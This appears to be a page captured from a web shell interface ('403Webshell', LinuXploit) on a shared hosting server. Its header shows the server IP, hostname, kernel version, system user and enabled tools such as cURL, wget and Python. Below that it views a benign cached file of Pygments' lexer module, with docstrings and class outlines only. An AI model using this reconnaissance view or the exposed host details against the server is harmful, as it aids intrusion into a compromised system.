403Webshell
Server IP : 104.21.83.152  /  Your IP : 216.73.216.251
Web Server : LiteSpeed
System : Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User : akhalid ( 749)
PHP Version : 8.3.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/python38/lib/python3.8/site-packages/pip/_vendor/pygments/__pycache__/

Current File : /opt/alt/python38/lib/python3.8/site-packages/pip/_vendor/pygments/__pycache__/lexer.cpython-38.pyc
[ Binary file: CPython 3.8 bytecode, not plain text. Readable module structure recovered from the embedded strings: ]

"""
    pygments.lexer
    ~~~~~~~~~~~~~~

    Base lexer classes.

    :copyright: Copyright 2006-2022 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
"""
import re
import sys
import time

from pip._vendor.pygments.filter import apply_filters, Filter
from pip._vendor.pygments.filters import get_filter_by_name
from pip._vendor.pygments.token import Error, Text, Other, _TokenType
from pip._vendor.pygments.util import get_bool_opt, get_int_opt, \
    get_list_opt, make_analysator, Future, guess_decode
from pip._vendor.pygments.regexopt import regex_opt

__all__ = ['Lexer', 'RegexLexer', 'ExtendedRegexLexer', 'DelegatingLexer',
           'LexerContext', 'include', 'inherit', 'bygroups', 'using', 'this',
           'default', 'words']

# (BOM bytes, encoding) pairs: utf-8, utf-32, utf-32be, utf-16, utf-16be
_encoding_map = [...]


class LexerMeta(type):
    """
    This metaclass automagically converts ``analyse_text`` methods into
    static methods which always return float values.
    """


class Lexer(metaclass=LexerMeta):
    """
    Lexer for a specific language.

    Basic options recognized:
    ``stripnl``
        Strip leading and trailing newlines from the input (default: True).
    ``stripall``
        Strip all leading and trailing whitespace from the input
        (default: False).
    ``ensurenl``
        Make sure that the input ends with a newline (default: True).  This
        is required for some lexers that consume input linewise.

        .. versionadded:: 1.3

    ``tabsize``
        If given and greater than 0, expand tabs in the input (default: 0).
    ``encoding``
        If given, must be an encoding name. This encoding will be used to
        convert the input string to Unicode, if it is not already a Unicode
        string (default: ``'guess'``, which uses a simple UTF-8 / Locale /
        Latin1 detection.  Can also be ``'chardet'`` to use the chardet
        library, if it is installed.
    ``inencoding``
        Overrides the ``encoding`` if given.
    """
    # Methods present in the bytecode: __init__, __repr__, add_filter,
    # analyse_text, get_tokens, get_tokens_unprocessed.


class DelegatingLexer(Lexer):
    """
    This lexer takes two lexer as arguments. A root lexer and
    a language lexer. First everything is scanned using the language
    lexer, afterwards all ``Other`` tokens are lexed using the root
    lexer.

    The lexers from the ``template`` lexer package use this base lexer.
    """


class include(str):
    """
    Indicates that a state should include rules from another state.
    """


class _inherit:
    """
    Indicates the a state should inherit from its superclass.
    """

inherit = _inherit()


class combined(tuple):
    """
    Indicates a state combined from multiple states.
    """


class _PseudoMatch:
    """
    A pseudo match object constructed from a string.
    """
    # Methods: __init__, start, end, group, groups, groupdict.


def bygroups(*args):
    """
    Callback that yields multiple actions for each group in the match.
    """


class _This:
    """
    Special singleton used for indicating the caller class.
    Used by ``using``.
    """

this = _This()


def using(_other, **kwargs):
    """
    Callback that processes the match with a different lexer.

    The keyword arguments are forwarded to the lexer, except `state` which
    is handled separately.

    `state` specifies the state that the new lexer will start in, and can
    be an enumerable such as ('root', 'inline', 'string') or a simple
    string which is assumed to be on top of the root state.

    Note: For that to work, `_other` must not be an `ExtendedRegexLexer`.
    """


class default:
    """
    Indicates a state or state action (e.g. #pop) to apply.
    For example default('#pop') is equivalent to ('', Token, '#pop')
    Note that state tuples may be used as well.

    .. versionadded:: 2.0
    """


class words(Future):
    """
    Indicates a list of literal words that is transformed into an optimized
    regex that matches any of the words.

    .. versionadded:: 2.0
    """


class RegexLexerMeta(LexerMeta):
    """
    Metaclass for RegexLexer, creates the self._tokens attribute from
    self.tokens on the first instantiation.
    """
    # Methods: _process_regex, _process_token, _process_new_state,
    # _process_state, process_tokendef, get_tokendefs, __call__.


class RegexLexer(Lexer, metaclass=RegexLexerMeta):
    """
    Base for simple stateful regular expression-based lexers.
    Simplifies the lexing process so that you need only
    provide a list of states and regular expressions.
    """
    flags = re.MULTILINE
    tokens = {}

    def get_tokens_unprocessed(self, text, stack=('root',)):
        """
        Split ``text`` into (tokentype, text) pairs.

        ``stack`` is the initial stack (default: ``['root']``)
        """


class LexerContext:
    """
    A helper object that holds lexer position data.
    """


class ExtendedRegexLexer(RegexLexer):
    """
    A RegexLexer that uses a context object to store its state.
    """

    def get_tokens_unprocessed(self, text, context=None):
        """
        Split ``text`` into (tokentype, text) pairs.
        If ``context`` is given, use this lexer context instead.
        """


def do_insertions(insertions, tokens):
    """
    Helper for lexers which must combine the results of several
    sublexers.

    ``insertions`` is a list of ``(index, itokens)`` pairs.
    Each ``itokens`` iterable should be inserted at position
    ``index`` into the token stream given by the ``tokens``
    argument.

    The result is a combined token stream.

    TODO: clean up the code here.
    """


class ProfilingRegexLexerMeta(RegexLexerMeta):
    """Metaclass for ProfilingRegexLexer, collects regex timing info."""


class ProfilingRegexLexer(RegexLexer, metaclass=ProfilingRegexLexerMeta):
    """Drop-in replacement for RegexLexer that does profiling of its regexes."""
Youez - 2016 - github.com/yon3zu
LinuXploit